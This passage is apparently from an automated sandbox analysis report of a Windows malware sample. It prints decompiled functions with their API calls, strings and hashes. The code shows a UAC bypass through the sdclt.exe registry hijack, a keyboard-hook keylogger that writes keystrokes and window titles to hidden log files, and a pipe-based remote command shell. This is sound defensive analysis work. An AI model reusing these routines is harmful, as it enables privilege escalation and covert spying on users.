					GetModuleFileNameA(0,  &_v1616, 0x400);
					E01042E2C(_t47, 0x1048fe6,  &_v1616);
					E01042E2C(_t47, "DelegateExecute", 0x1048fe6);
					GetSystemDirectoryW( &_v592, 0x104);
					lstrcatW( &_v592, L"\\sdclt.exe");
					_t53 = L"open";
					ShellExecuteW(0, _t53,  &_v592, 0, 0, 1);
					asm("movaps xmm0, [0x104a900]");
					_v72.lpFile =  &_v592;
					_v72.cbSize = 0x3c;
					_v72.fMask = 0x40;
					_v72.hwnd = 0;
					_v72.lpVerb = _t53;
					asm("movups [ebp-0x30], xmm0");
					ShellExecuteExW( &_v72);
					TerminateProcess(_v72.hProcess, 0);
					if(_v8 != 0) {
						E01040CD8( &_v12);
					}
					Sleep(0x7d0);
					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
					ExitProcess(0);
				}
				return 0;
			}

0x0104314d
0x01043159
0x01043165
0x0104316f
0x01043178
0x0104317a
0x0104317d
0x0104317d
0x01043182
0x01043195
0x010431a6
0x010431b9
0x010431c4
0x010431d8
0x010431ea
0x010431fa
0x01043202
0x01043208
0x01043215
0x0104321c
0x01043223
0x0104322a
0x0104322d
0x01043230
0x01043234
0x0104323e
0x01043247
0x0104324c
0x0104324c
0x01043256
0x01043266
0x0104326d
0x0104326d
0x01043278

APIs

Part of subcall function 0104111B: GetCurrentProcess.KERNEL32(00000008,00000000,76B30770,00000000,76B30770,00000000,?,?,?,?,0104563F,?), ref: 0104112D
Part of subcall function 0104111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0104563F,?), ref: 01041134
Part of subcall function 0104111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0104563F,?), ref: 01041152
Part of subcall function 0104111B: FindCloseChangeNotification.KERNEL32(00000000), ref: 01041167

CloseHandle.KERNEL32(?,00000000), ref: 01043159
GetCurrentProcess.KERNEL32(?), ref: 01043168
IsWow64Process.KERNEL32(00000000), ref: 0104316F
GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 010431A6
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 010431D8
lstrcatW.KERNEL32(?,\sdclt.exe), ref: 010431EA
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 01043202
ShellExecuteExW.SHELL32(?), ref: 01043234
TerminateProcess.KERNEL32(00000000,00000000), ref: 0104323E
Sleep.KERNEL32(000007D0), ref: 01043256
RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 01043266
ExitProcess.KERNEL32 ref: 0104326D

Strings

DelegateExecute, xrefs: 010431BF
@, xrefs: 01043223
<, xrefs: 0104321C
Software\Classes\Folder\shell\open\command, xrefs: 0104325C
\sdclt.exe, xrefs: 010431DE
open, xrefs: 010431FA, 01043200

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentExecuteShellToken$ChangeDeleteDirectoryExitFileFindHandleInformationModuleNameNotificationOpenSleepSystemTerminateWow64lstrcat
String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
API String ID: 368901745-2081737068
Opcode ID: 822b67927ea4a63009f148760f591e433ed407badee5ce9cf9ded2489c621ae5
Instruction ID: 57415f6dd9e48ca41aa73527a8a8c8fde0c5279fceaf213de423aa59ed50dbe3
Opcode Fuzzy Hash: 822b67927ea4a63009f148760f591e433ed407badee5ce9cf9ded2489c621ae5
Instruction Fuzzy Hash: 373180F5C01118EBDB21EBA5DEC8DDEBBBDEF45301F0040A5F689A2114D7795A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01037F94 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135
windowstringfileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E01037F94(void* __edx, void* __eflags) {
				short _v176;
				struct tagMSG _v204;
				void* _v208;
				struct _SYSTEMTIME _v228;
				struct HINSTANCE__* _t19;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t40;
				intOrPtr _t45;
				void* _t46;
				void* _t49;
				intOrPtr* _t50;
				void* _t59;
				struct HINSTANCE__* _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t90;

				_t90 = __eflags;
				_t71 = __edx;
				_t19 = GetModuleHandleA(0);
				_t62 =  *0x105675c; // 0x0
				_t60 = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E01031052(_t62 + 0x210, 0, 0x800);
				_t22 =  *0x105675c; // 0x0
				E01031052(_t22 + 0x10, 0, 0x208);
				_t25 =  *0x105675c; // 0x0
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
				_t27 =  *0x105675c; // 0x0
				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
				GetLocalTime( &_v228);
				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
				_t40 =  *0x105675c; // 0x0
				lstrcatW(_t40 + 0x10,  &_v176);
				_t64 =  *0x105675c; // 0x0
				_t11 = _t64 + 0x10; // 0x10
				E01033411(_t64 + 0xc, _t71, _t11);
				_t45 =  *0x105675c; // 0x0
				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
				_t66 =  *0x105675c; // 0x0
				 *(_t66 + 4) = _t46;
				CloseHandle(_t46);
				_v228.wYear = 0;
				_t68 = E010434A2("c:\\windows\\system32\\user32.dll",  &_v228);
				_t49 = E01041EF1(_t68, 0, _t90);
				_t91 = _t49;
				if(_t49 == 0) {
					_t50 =  *0x1056758; // 0x0
				} else {
					_push(_t68);
					_t50 = E01041E88(_t49, "SetWindowsHookExA", _t91);
					 *0x1056758 = _t50;
				}
				 *_t50(0xd, E01038125, _t60, 0);
				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
					TranslateMessage( &_v204);
					DispatchMessageA( &_v204);
				}
				return 0;
			}

0x01037f94
0x01037f94
0x01037fa5
0x01037fab
0x01037fb5
0x01037fbf
0x01037fc5
0x01037fc6
0x01037fc7
0x01037fcc
0x01037fd1
0x01037fe3
0x01037fe8
0x01037ff9
0x01037fff
0x01038013
0x0103801a
0x0103804e
0x0103805c
0x01038065
0x01038067
0x0103806d
0x01038074
0x01038079
0x01038091
0x01038097
0x0103809e
0x010380a1
0x010380ab
0x010380bb
0x010380bd
0x010380c2
0x010380c4
0x010380db
0x010380c6
0x010380c6
0x010380ce
0x010380d4
0x010380d4
0x010380e9
0x0103810c
0x010380fb
0x01038106
0x01038106
0x01038122

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 01037FA5
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 01037FF9
lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 01038013
GetLocalTime.KERNEL32(?), ref: 0103801A
wsprintfW.USER32 ref: 0103804E
lstrcatW.KERNEL32(-00000010,?), ref: 01038065
CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010), ref: 01038091
CloseHandle.KERNEL32(00000000), ref: 010380A1

Part of subcall function 010434A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,01045553), ref: 010434CF
Part of subcall function 010434A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,01045553), ref: 010434E2
Part of subcall function 010434A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,01045553), ref: 010434F3
Part of subcall function 010434A2: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,01045553), ref: 01043500

Part of subcall function 01041EF1: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,747582B0,00000000,?,?,?,?,010380C2), ref: 01041F1D

GetMessageA.USER32 ref: 01038114

Part of subcall function 01041E88: lstrcmpA.KERNEL32(?,01043251,?,open,01043251), ref: 01041EC1

TranslateMessage.USER32(?), ref: 010380FB
DispatchMessageA.USER32 ref: 01038106

Strings

%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 01038048
\Microsoft Vision\, xrefs: 0103800D
c:\windows\system32\user32.dll, xrefs: 010380AF
SetWindowsHookExA, xrefs: 010380C7

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: File$Message$CloseCreateHandlelstrcat$AllocChangeDispatchFindFolderLocalModuleNotificationPathReadSizeTimeTranslateVirtuallstrcmpwsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
API String ID: 1641748825-3884914687
Opcode ID: d99ea412da68244d1cabbd39b715235c1f21ef5cbb7c83c9a6538c21e1b26644
Instruction ID: 22641f98671c8126bf8b3376d36abc7b111acbb58f42734a9574b7431ecebbc8
Opcode Fuzzy Hash: d99ea412da68244d1cabbd39b715235c1f21ef5cbb7c83c9a6538c21e1b26644
Instruction Fuzzy Hash: E0418BB1500304ABD3609BA9DD88F6B77ECFBD8704F00495AFAC5D2285EB7AE904C761

Uniqueness

Uniqueness Score: -1.00%

Function 010385CB Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010385CB(void* __ecx, void* __edx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _v12;
				void* _v16;
				short _v536;
				int _t35;
				intOrPtr _t37;
				int _t39;
				intOrPtr _t40;
				WCHAR* _t41;
				intOrPtr _t43;
				void* _t44;
				int _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				long _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				long _t65;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				intOrPtr _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t100;

				_t94 = __edx;
				_v16 = __ecx;
				E01031052( &_v536, 0, 0x208);
				_v8 = 0;
				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
				_t106 = _t35;
				if(_t35 <= 0) {
					E01033411( &_v8, _t94, L"{Unknown}");
				} else {
					_t73 = E010336F7( &_v12,  &_v536);
					E01033447(E0103357C( &_v8, _t94, _t106, "{"), _t106, _t73);
					E0103357C(_t74, _t94, _t106, "}");
					E01035FEB(_v12);
					_v12 = 0;
				}
				_t37 =  *0x105675c; // 0x0
				_t39 = lstrlenW(_t37 + 0x210);
				_t40 =  *0x105675c; // 0x0
				if(_t39 == 0) {
					L6:
					_t41 = _t40 + 0x210;
					__eflags = _t41;
					lstrcpyW(_t41, _v8);
					_t43 =  *0x105675c; // 0x0
					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
				} else {
					_t70 = E0103335A( &_v8, E010336F7( &_v12, _t40 + 0x210));
					E01035FEB(_v12);
					_t40 =  *0x105675c; // 0x0
					_v12 = 0;
					if(_t70 == 0) {
						goto L6;
					} else {
						 *(_t40 + 0xa10) = 1;
					}
				}
				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
				_t83 =  *0x105675c; // 0x0
				 *(_t83 + 4) = _t44;
				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
					_t21 = _t83 + 8; // 0x8
					_t98 = L"\r\n";
					_t54 = lstrlenW(_t98);
					_t55 =  *0x105675c; // 0x0
					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
					_t57 =  *0x105675c; // 0x0
					_t59 = E01033373( &_v8);
					_t61 =  *0x105675c; // 0x0
					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
					_t63 =  *0x105675c; // 0x0
					_t100 = L"\r\n";
					_t65 = lstrlenW(_t100);
					_t66 =  *0x105675c; // 0x0
					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
					_t83 =  *0x105675c; // 0x0
				}
				_t97 = _v16;
				_t28 = _t83 + 8; // 0x8
				_t46 = lstrlenW(_t97);
				_t48 =  *0x105675c; // 0x0
				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
				_t50 =  *0x105675c; // 0x0
				CloseHandle( *(_t50 + 4));
				return E01035FEB(_v8);
			}

0x010385cb
0x010385de
0x010385e9
0x010385f1
0x01038607
0x0103860d
0x0103860f
0x0103865a
0x01038611
0x0103861b
0x01038634
0x01038640
0x01038648
0x0103864d
0x0103864d
0x0103865f
0x01038670
0x01038674
0x01038679
0x010386b4
0x010386b7
0x010386b7
0x010386bd
0x010386c3
0x010386c8
0x0103867b
0x0103868d
0x01038697
0x0103869c
0x010386a1
0x010386a6
0x00000000
0x010386a8
0x010386a8
0x010386a8
0x010386a6
0x010386de
0x010386e4
0x010386f6
0x010386f9
0x010386fd
0x01038700
0x01038707
0x0103870a
0x01038713
0x01038715
0x01038726
0x0103872e
0x01038737
0x01038739
0x0103873e
0x0103874a
0x0103874d
0x01038756
0x01038758
0x01038758
0x0103875e
0x01038761
0x01038768
0x0103876d
0x01038776
0x01038778
0x01038780
0x01038792

APIs

GetForegroundWindow.USER32(?,?,?), ref: 010385F4
GetWindowTextW.USER32 ref: 01038607
lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 01038670
lstrcpyW.KERNEL32 ref: 010386BD
CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 010386DE
lstrlenW.KERNEL32(01047A60,00000008,00000000,?,?), ref: 01038707
WriteFile.KERNEL32(?,01047A60,00000000,?,?), ref: 01038713
WriteFile.KERNEL32(?,?,00000000,-00000008,00000000,?,?), ref: 01038737
lstrlenW.KERNEL32(01047A60,-00000008,00000000,?,?), ref: 0103874A
WriteFile.KERNEL32(?,01047A60,00000000,?,?), ref: 01038756
lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 01038768
WriteFile.KERNEL32(?,?,00000000,?,?), ref: 01038776
CloseHandle.KERNEL32(?,?,?), ref: 01038780

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01033447: lstrcatW.KERNEL32(00000000,76B30770), ref: 01033477

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Strings

{Unknown}, xrefs: 01038652

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$File$Write$Window$CloseCreateDispatcherExceptionForegroundFreeHandleTextUserVirtuallstrcatlstrcpy
String ID: {Unknown}
API String ID: 4210971544-4054869793
Opcode ID: 91ad52e096a430d1f859cf1147b65a60a2b00b79d841ac967ed12900d7d7ecc5
Instruction ID: 9d1230e4d23c73c3f03727626b783f1891671d21f2a2c18d422f9f71fa711b68
Opcode Fuzzy Hash: 91ad52e096a430d1f859cf1147b65a60a2b00b79d841ac967ed12900d7d7ecc5
Instruction Fuzzy Hash: 9F515EB5A01208AFD710EB94DD89FDA77BCFB64300F0480A9F586A7250DB76AE45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0103D42D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 71
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103D42D(struct _QUERY_SERVICE_CONFIG* _a4) {
				int _v8;
				void* __ecx;
				void* _t10;
				void* _t26;
				struct _QUERY_SERVICE_CONFIG* _t34;
				void* _t37;

				_v8 = 0;
				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t37 = _t10;
				if(_t37 != 0) {
					_t26 = OpenServiceW(_t37,  *_a4, 1);
					if(_t26 != 0) {
						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
							_t34 = E01036045(_v8);
							_a4 = _t34;
							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
								CloseServiceHandle(_t37);
								CloseServiceHandle(_t26);
								E01031099(_a4);
								_t10 =  *(_t34 + 4);
							} else {
								goto L6;
							}
						} else {
							L6:
							CloseServiceHandle(_t37);
							CloseServiceHandle(_t26);
							goto L7;
						}
					} else {
						CloseServiceHandle(_t37);
						L7:
						_t10 = 0;
					}
				}
				return _t10;
			}

0x0103d43d
0x0103d440
0x0103d446
0x0103d44a
0x0103d45f
0x0103d463
0x0103d47d
0x0103d492
0x0103d49b
0x0103d4a8
0x0103d4c4
0x0103d4c7
0x0103d4cc
0x0103d4d2
0x00000000
0x00000000
0x00000000
0x0103d4aa
0x0103d4aa
0x0103d4b1
0x0103d4b4
0x00000000
0x0103d4b4
0x0103d465
0x0103d466
0x0103d4b6
0x0103d4b6
0x0103d4b6
0x0103d4d4
0x0103d4d8

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0103D440
OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0103D459
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D466
QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0103D475
GetLastError.KERNEL32 ref: 0103D47F
QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0103D4A0
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D4B1
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D4B4
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D4C4
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D4C7

Part of subcall function 01031099: GetProcessHeap.KERNEL32(00000000,00000000,01043499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0103109F
Part of subcall function 01031099: HeapFree.KERNEL32(00000000), ref: 010310A6

Strings

ServicesActive, xrefs: 0103D437
@Mqt, xrefs: 0103D47F

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
String ID: @Mqt$ServicesActive
API String ID: 1929760286-1382913386
Opcode ID: 089031b9f8c84ce5a6a48cd70843152dcde0a2178eebafe25c7b289f54300174
Instruction ID: f342032d0613c489531f309a13f7b152cbb0c685ee8945343fb1796f5b7305f6
Opcode Fuzzy Hash: 089031b9f8c84ce5a6a48cd70843152dcde0a2178eebafe25c7b289f54300174
Instruction Fuzzy Hash: C2118EB9501119FBDB219BA6EE88DDF7FADEBC535070040A6F58196105DF79AA00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0104001A Relevance: 19.6, APIs: 13, Instructions: 135
pipethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0104001A(void* __eflags, char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES _v36;
				void* _t54;
				void* _t61;
				void* _t64;
				int _t66;
				void* _t76;
				int _t94;
				void* _t95;

				E0103FFA8(0x1056608);
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t94 = 1;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
				_v36.nLength = 0xc;
				_v36.bInheritHandle = 1;
				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
					L7:
					E010401AB( &_v12);
					E010401AB( &_v8);
					E010401AB( &_v16);
					E010401AB( &_v20);
					E010401AB( &_v24);
					E0103FFA8(0x1056608);
					_t94 = 0;
				} else {
					_t54 = GetCurrentProcess();
					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
						goto L7;
					} else {
						_t61 = GetCurrentProcess();
						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x1056610, 0, 0, 2) == 0) {
							goto L7;
						} else {
							_t64 = GetCurrentProcess();
							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x1056614, 0, 0, 2);
							_t101 = _t66;
							if(_t66 == 0) {
								goto L7;
							} else {
								E010401AB( &_v12);
								E010401AB( &_v20);
								E0103373F(_t95,  &_a4);
								if(E0103FDB0(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
									goto L7;
								} else {
									E010401AB( &_v8);
									E010401AB( &_v24);
									E010401AB( &_v16);
									 *0x1056618 = CreateEventA(0, 1, 0, 0);
									_t76 = CreateThread(0, 0, E0103FE49, 0x1056608, 0, 0x1056620);
									 *0x105661c = _t76;
									if(_t76 == 0) {
										goto L7;
									}
								}
							}
						}
					}
				}
				E01035FEB(_a4);
				return _t94;
			}

0x01040028
0x0104002d
0x01040034
0x0104003a
0x0104003e
0x0104003f
0x01040043
0x01040047
0x01040051
0x0104005c
0x01040068
0x01040166
0x01040169
0x01040171
0x01040179
0x01040181
0x01040189
0x01040193
0x01040198
0x0104006e
0x0104007d
0x01040090
0x00000000
0x010400b2
0x010400bd
0x010400ca
0x00000000
0x010400d0
0x010400db
0x010400e4
0x010400e6
0x010400e8
0x00000000
0x010400ea
0x010400ed
0x010400f5
0x0104010a
0x01040116
0x00000000
0x01040118
0x0104011b
0x01040123
0x0104012b
0x01040152
0x01040157
0x0104015d
0x01040164
0x00000000
0x00000000
0x01040164
0x01040116
0x010400e8
0x010400ca
0x01040090
0x0104019d
0x010401a8

APIs

Part of subcall function 0103FFA8: GetCurrentThreadId.KERNEL32 ref: 0103FFB4
Part of subcall function 0103FFA8: SetEvent.KERNEL32(00000000), ref: 0103FFC8
Part of subcall function 0103FFA8: WaitForSingleObject.KERNEL32(0105661C,00001388), ref: 0103FFD5
Part of subcall function 0103FFA8: TerminateThread.KERNEL32(0105661C,000000FE), ref: 0103FFE6

CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 01040060
GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0104007D
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 01040083
DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0104008C
CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 010400A4
GetCurrentProcess.KERNEL32(01056610,00000000,00000000,00000002,?,00000000), ref: 010400BD
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 010400C3
DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 010400C6
GetCurrentProcess.KERNEL32(01056614,00000000,00000000,00000002,?,00000000), ref: 010400DB
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 010400E1
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01040137
CreateThread.KERNEL32 ref: 01040157
DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 010400E4

Part of subcall function 010401AB: CloseHandle.KERNEL32(01056618,01056608,0103FFFB,?,00000000,01032BC7,00000000,exit,00000000,start), ref: 010401B5

Part of subcall function 0103373F: lstrcpyW.KERNEL32 ref: 01033769

Part of subcall function 0103FDB0: CreateProcessW.KERNEL32 ref: 0103FE02

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
String ID:
API String ID: 337272696-0
Opcode ID: 3d97eb76f2e3704562d3e51ae0242b28e3f955eafff92dd3929705a1b893f372
Instruction ID: c2abda18a33f762ab664e2bef6653553c6d50fd369637049b718957718cdcbf7
Opcode Fuzzy Hash: 3d97eb76f2e3704562d3e51ae0242b28e3f955eafff92dd3929705a1b893f372
Instruction Fuzzy Hash: 414133B1A0020ABBEB20EBA5CD85FEF7B7CAF54700F500465B681B51E4DB759A04CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0103DD72 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 324
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0103DD72(struct _CRITICAL_SECTION* __ecx, void* __edx) {
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				int _t102;
				int _t103;
				int _t106;
				int _t107;
				void* _t109;
				void* _t110;
				int _t111;
				int _t113;
				int _t114;
				int _t120;
				void* _t121;
				int _t159;
				void* _t172;
				int _t181;
				int _t182;
				signed int _t203;
				char* _t233;
				intOrPtr _t244;
				void* _t248;
				char* _t251;
				void* _t264;
				struct _CRITICAL_SECTION* _t267;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				void* _t281;

				_t264 = __edx;
				_t205 = __ecx;
				_t281 = (_t279 & 0xfffffff8) - 0x5c;
				_t267 = __ecx;
				_t203 = 0;
				_v84 = 0;
				_v80 = 0;
				_v96 = 0;
				EnterCriticalSection(__ecx);
				if(E01041177(_t205) == 1) {
					_t205 =  &_v96;
					E01040CFF( &_v96);
				}
				_t270 = _t267 + 0x38;
				_t102 = PathFileExistsW( *(_t267 + 0x38));
				_t283 = _t102;
				if(_t102 != 0) {
					L14:
					_t271 = _t267 + 0x3c;
